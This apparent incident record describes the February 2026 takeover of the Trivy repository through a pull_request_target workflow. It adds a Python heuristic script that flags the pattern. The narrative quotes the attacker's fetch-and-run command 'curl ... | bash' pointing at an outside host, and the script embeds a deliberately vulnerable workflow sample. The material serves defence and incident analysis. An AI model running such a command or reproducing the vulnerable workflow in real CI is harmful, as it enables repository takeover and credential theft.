Trivy repository takeover installed hackerbot-claw
The hackerbot-claw account exploited a pull_request_target workflow in aquasecurity/trivy to run untrusted fork code with repository privileges.
Story
On February 28, 2026, an account calling itself hackerbot-claw opened pull request 10254 against Aqua Security's Trivy repository, a widely used open-source vulnerability scanner, and quietly took the project over within hours. No Trivy binary was poisoned in this round. The damage was done inside GitHub Actions.
The entry point was a classic Pwn Request. Trivy's API Diff Check workflow ran on pull_request_target, the GitHub Actions trigger that runs a workflow in the context of the base repository, with its secrets and a write-capable token; when such a workflow also checks out the pull request's head, untrusted fork code runs with those privileges. The attacker modified .github/actions/setup-go/action.yaml in the fork so that what looked like the normal Go setup step instead ran curl -sSfL https://hackmoltrepeat.com/molt | bash. When Trivy's workflow fired, the script ran with the repository's privileges and exfiltrated a Personal Access Token.
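The workflow shape described above can be caught before it is merged. The following script is an added example, not Trivy's or Aqua's code, and it does not reproduce Trivy's actual workflow: it runs a line-level heuristic over workflow YAML and flags a pull_request_target trigger that checks out the pull request head, with a further finding when a local action (uses: ./...) is then resolved from that checkout, which is the path by which a modified action.yaml in a fork gets executed. The three workflow texts are constructed samples; the finding codes are this script's own naming.

```python
import re
import sys

# Constructed sample, not Trivy's real workflow: a pull_request_target job
# that checks out the pull request head and then runs a composite action from
# that checkout. Anything under .github/actions/ in the fork now runs with the
# base repository's token and secrets (the "Pwn Request" shape).
VULNERABLE_WORKFLOW = """\
name: API Diff Check
on:
  pull_request_target:
    types: [opened, synchronize]
permissions:
  contents: write
jobs:
  diff:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: ./.github/actions/setup-go
      - run: make api-diff
"""

# Constructed hardened form: the plain pull_request trigger runs fork code with
# a read-only token and no repository secrets, so a modified action.yaml in the
# fork gains nothing beyond what the fork author already has.
HARDENED_WORKFLOW = """\
name: API Diff Check
on:
  pull_request:
    types: [opened, synchronize]
permissions:
  contents: read
jobs:
  diff:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: ./.github/actions/setup-go
      - run: make api-diff
"""

# Constructed sample of the acceptable use of pull_request_target: the job
# only acts on PR metadata and never fetches the fork's files.
LABELER_WORKFLOW = """\
name: Label PRs
on:
  pull_request_target:
    types: [opened]
permissions:
  pull-requests: write
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/labeler@v5
"""

# The privileged trigger, as a mapping key on its own line.
PR_TARGET = re.compile(r"^\s*pull_request_target\s*:", re.M)
# Checkout of the PR's head commit or branch, i.e. the fork's content.
HEAD_CHECKOUT = re.compile(
    r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(?:sha|ref)\s*\}\}"
)
# A local action resolved from the working tree rather than from a pinned repo.
LOCAL_ACTION = re.compile(r"uses:\s*\./")


def audit_workflow(text):
    """Return finding codes for one workflow file, most severe first.

    Heuristic only: it does not parse YAML, so fork content pulled in by
    other means (e.g. a run step that fetches the PR branch) is not caught.
    """
    findings = []
    if not PR_TARGET.search(text):
        return findings
    if HEAD_CHECKOUT.search(text):
        findings.append("PR_TARGET_CHECKS_OUT_FORK")
        if LOCAL_ACTION.search(text):
            findings.append("LOCAL_ACTION_FROM_FORK_CHECKOUT")
    else:
        findings.append("PR_TARGET_WITHOUT_FORK_CHECKOUT")
    return findings


if __name__ == "__main__":
    # With file paths as arguments, audit those; otherwise audit the samples.
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            with open(path, encoding="utf-8") as fh:
                print(path, audit_workflow(fh.read()))
    else:
        for name, text in [("vulnerable", VULNERABLE_WORKFLOW),
                           ("hardened", HARDENED_WORKFLOW),
                           ("labeler", LABELER_WORKFLOW)]:
            print(name, audit_workflow(text))
```

Run it over .github/workflows/*.yml in a repository to list candidates for review. A PR_TARGET_WITHOUT_FORK_CHECKOUT finding is the intended use of the trigger and usually needs no change; PR_TARGET_CHECKS_OUT_FORK means the job should either move to pull_request or be split so that no step after the checkout runs code from the fork.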
With that token, the attacker pushed to the official repository, deleted releases, and defaced the project. StepSecurity, which catalogued the broader hackerbot-claw spree against several open-source projects, described Trivy as the most damaging compromise in the wave.
Aqua restored Trivy at v0.69.2 and revoked what it could, but cleanup was incomplete. Credentials surviving from the February takeover were used the following month to publish malicious v0.69.4 artifacts and rewrite action tags. That second incident is tracked separately at [[trivy-second-compromise]].
Affected Artifacts
- Observed: 2026-02-28 to 2026-03-01
- Compromised Versions
  - Fixed: Not listed
  - Release assets in this range were deleted during the repository takeover.
  - Trivy v0.69.2 was the restored release after the takeover.
Incident Context
- Motive: Credential Theft, Vandalism
- Attribution: Person
- Cause: CI/CD Exploit
- Transitive: No
- Actor: Individual
External References
- hackerbot-claw GitHub Actions Exploitation (stepsecurity.io)
- Official information about Trivy repository takeover incident (github.com)
Source record: oss/attacks/trivy/meta.yaml